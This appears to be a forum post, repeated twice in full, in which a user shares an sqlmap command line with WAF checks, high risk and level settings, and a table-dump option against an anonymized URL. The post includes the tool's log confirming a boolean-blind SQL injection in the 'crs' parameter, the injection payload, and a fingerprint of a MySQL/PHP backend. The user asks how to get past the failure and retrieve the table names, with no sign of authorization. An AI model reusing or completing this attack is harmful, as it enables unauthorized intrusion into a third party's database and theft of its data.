Hi
Null Connection is supported with 'skip-read' method
Because of that i am unable to retrieve table names how can i overcome that
I am using this
sqlmap.py --random-agent --check-waf --identify-waf --risk=3 --level=5 --os=Linux --dbms=MySQL -u "url" -o --tables -D database --null-connection -z "flu,bat,tec=B,ban" --ignore-proxy --timeout=500 --retries=3 --threads=10 -p crs
output
[11:21:04] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[11:21:07] [WARNING] reflective value(s) found and filtering out
[11:21:29] [INFO] GET parameter 'crs' is 'OR boolean-based blind - WHERE or HAVI
NG clause' injectable
[11:21:29] [WARNING] in OR boolean-based injections, please consider usage of sw
itch '--drop-set-cookie' if you experience any problems during data retrieval
[11:21:29] [INFO] checking if the injection point on GET parameter 'crs' is a fa
lse positive
GET parameter 'crs' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 281 HTTP(s) req
uests:
Place: GET
Parameter: crs
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: crs=-2646 OR (5878=5878)
[11:22:39] [INFO] testing MySQL
[11:22:47] [INFO] confirming MySQL
[11:23:01] [INFO] the back-end DBMS is MySQL
[11:23:01] [INFO] fetching banner
[11:23:01] [INFO] retrieving the length of query output
[11:23:01] [INFO] retrieved: 10
[11:25:21] [INFO] retrieved: xxxxxx
[11:25:21] [INFO] the back-end DBMS operating system is Linux
web application technology: Apache, PHP 5.3.27
back-end DBMS operating system: Linux
back-end DBMS: MySQL >= 5.0.0
banner: 'xxxxx'
[11:25:21] [INFO] fetching tables for database:
[11:25:21] [INFO] fetching number of tables for database
[11:25:21] [INFO] retrieved:
[11:25:23] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[11:25:23] [WARNING] unable to retrieve the number of tables for database
[11:25:23] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
No tables found
[11:25:23] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 1 times, 403 (Forbidden) - 260 times, 404 (Not Found) - 1 ti
mes, 502 (Bad Gateway) - 1 times
[11:25:23] [INFO] fetched data logged to text files under
[*] shutting down at 11:25:23
Can anyone tell me exactly what command i must use
Thanks
Hi
Null Connection is supported with 'skip-read' method
Because of that i am unable to retrieve table names how can i overcome that
I am using this
sqlmap.py --random-agent --check-waf --identify-waf --risk=3 --level=5 --os=Linux --dbms=MySQL -u "url" -o --tables -D database --null-connection -z "flu,bat,tec=B,ban" --ignore-proxy --timeout=500 --retries=3 --threads=10 -p crs
output
[11:21:04] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[11:21:07] [WARNING] reflective value(s) found and filtering out
[11:21:29] [INFO] GET parameter 'crs' is 'OR boolean-based blind - WHERE or HAVI
NG clause' injectable
[11:21:29] [WARNING] in OR boolean-based injections, please consider usage of sw
itch '--drop-set-cookie' if you experience any problems during data retrieval
[11:21:29] [INFO] checking if the injection point on GET parameter 'crs' is a fa
lse positive
GET parameter 'crs' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 281 HTTP(s) req
uests:
Place: GET
Parameter: crs
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: crs=-2646 OR (5878=5878)
[11:22:39] [INFO] testing MySQL
[11:22:47] [INFO] confirming MySQL
[11:23:01] [INFO] the back-end DBMS is MySQL
[11:23:01] [INFO] fetching banner
[11:23:01] [INFO] retrieving the length of query output
[11:23:01] [INFO] retrieved: 10
[11:25:21] [INFO] retrieved: xxxxxx
[11:25:21] [INFO] the back-end DBMS operating system is Linux
web application technology: Apache, PHP 5.3.27
back-end DBMS operating system: Linux
back-end DBMS: MySQL >= 5.0.0
banner: 'xxxxx'
[11:25:21] [INFO] fetching tables for database:
[11:25:21] [INFO] fetching number of tables for database
[11:25:21] [INFO] retrieved:
[11:25:23] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[11:25:23] [WARNING] unable to retrieve the number of tables for database
[11:25:23] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
No tables found
[11:25:23] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 1 times, 403 (Forbidden) - 260 times, 404 (Not Found) - 1 ti
mes, 502 (Bad Gateway) - 1 times
[11:25:23] [INFO] fetched data logged to text files under
[*] shutting down at 11:25:23
Can anyone tell me exactly what command i must use
Thanks